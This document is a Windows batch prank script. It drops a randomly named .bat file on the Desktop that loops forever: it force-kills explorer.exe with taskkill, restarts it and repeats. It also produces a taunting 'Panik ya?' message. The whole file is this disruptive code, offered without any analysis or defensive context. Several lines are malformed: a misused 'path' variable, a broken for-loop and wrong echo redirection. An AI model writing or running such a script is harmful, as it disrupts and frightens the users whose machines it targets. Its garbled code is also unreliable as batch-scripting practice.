@echo off
set path = "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo set path = "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo for /l %%i in (1,1,10) do ( > %path%
echo @echo off >> "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo goto :loop >> "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo :loop >> "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo powershell -WindowStyle Minimized -Command "& {Start-Process cmd -ArgumentList '/c ping localhost -n 5' -WindowStyle Minimized}" >> "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo taskkill /f /im explorer.exe >> "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo start explorer.exe >> "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo timeout /t 1000 /nobreak 2 > nul >> "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo goto :loop >> "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"
echo ) >> %path%
echo echo Panik ya? awkaowkoaaow > %CD%\alert.txt
echo start explorer %CD%\alert.txt
echo del %CD%\alert.txt

start explorer "%USERPROFILE%\Desktop\BAbiXTYWmjCxumjJukcsMxaUYaBODTwsMjaVyiQZXNnfkLzQBkwTPeiLrtyFLaEWzeKPmlHSDXwGCpiHUiYKQfUdnskRwCHQHeIAjsgBOIXjOFMBbuDXRbWQyYTiVHzUWbphtDEPtcRbDlTOrBpqGssrMZSqeJcoPgIuUyiLMSnTRsVWcgCQUWQWvSldKgQpvgORwRnQ.bat"